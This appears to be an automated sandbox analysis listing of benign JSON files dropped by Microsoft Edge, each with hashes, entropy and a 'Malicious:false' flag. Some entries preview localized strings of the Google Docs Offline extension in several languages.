                                SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1719
                                Entropy (8bit):4.287702203591075
                                Encrypted:false
                                SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):936
                                Entropy (8bit):4.457879437756106
                                Encrypted:false
                                SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                MD5:7D273824B1E22426C033FF5D8D7162B7
                                SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):3830
                                Entropy (8bit):3.5483353063347587
                                Encrypted:false
                                SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                MD5:342335A22F1886B8BC92008597326B24
                                SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1898
                                Entropy (8bit):4.187050294267571
                                Encrypted:false
                                SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):914
                                Entropy (8bit):4.513485418448461
                                Encrypted:false
                                SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):878
                                Entropy (8bit):4.4541485835627475
                                Encrypted:false
                                SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                MD5:A1744B0F53CCF889955B95108367F9C8
                                SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2766
                                Entropy (8bit):3.839730779948262
                                Encrypted:false
                                SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                MD5:97F769F51B83D35C260D1F8CFD7990AF
                                SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):978
                                Entropy (8bit):4.879137540019932
                                Encrypted:false
                                SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):907
                                Entropy (8bit):4.599411354657937
                                Encrypted:false
                                SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):914
                                Entropy (8bit):4.604761241355716
                                Encrypted:false
                                SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                MD5:0963F2F3641A62A78B02825F6FA3941C
                                SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):937
                                Entropy (8bit):4.686555713975264
                                Encrypted:false
                                SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                MD5:BED8332AB788098D276B448EC2B33351
                                SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1337
                                Entropy (8bit):4.69531415794894
                                Encrypted:false
                                SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                MD5:51D34FE303D0C90EE409A2397FCA437D
                                SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2846
                                Entropy (8bit):3.7416822879702547
                                Encrypted:false
                                SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):934
                                Entropy (8bit):4.882122893545996
                                Encrypted:false
                                SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                MD5:8E55817BF7A87052F11FE554A61C52D5
                                SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):963
                                Entropy (8bit):4.6041913416245
                                Encrypted:false
                                SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):4.569671329405572
                                Encrypted:false
                                SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                MD5:7F5F8933D2D078618496C67526A2B066
                                SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):884
                                Entropy (8bit):4.627108704340797
                                Encrypted:false
                                SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):980
                                Entropy (8bit):4.50673686618174
                                Encrypted:false
                                SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                MD5:D0579209686889E079D87C23817EDDD5
                                SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1941
                                Entropy (8bit):4.132139619026436
                                Encrypted:false
                                SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                MD5:DCC0D1725AEAEAAF1690EF8053529601
                                SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1969
                                Entropy (8bit):4.327258153043599
                                Encrypted:false
                                SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1674
                                Entropy (8bit):4.343724179386811
                                Encrypted:false
                                SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                MD5:64077E3D186E585A8BEA86FF415AA19D
                                SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1063
                                Entropy (8bit):4.853399816115876
                                Encrypted:false
                                SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                MD5:76B59AAACC7B469792694CF3855D3F4C
                                SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1333
                                Entropy (8bit):4.686760246306605
                                Encrypted:false
                                SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                MD5:970963C25C2CEF16BB6F60952E103105
                                SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1263
                                Entropy (8bit):4.861856182762435
                                Encrypted:false
                                SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                MD5:8B4DF6A9281333341C939C244DDB7648
                                SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1074
                                Entropy (8bit):5.062722522759407
                                Encrypted:false
                                SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                MD5:773A3B9E708D052D6CBAA6D55C8A5438
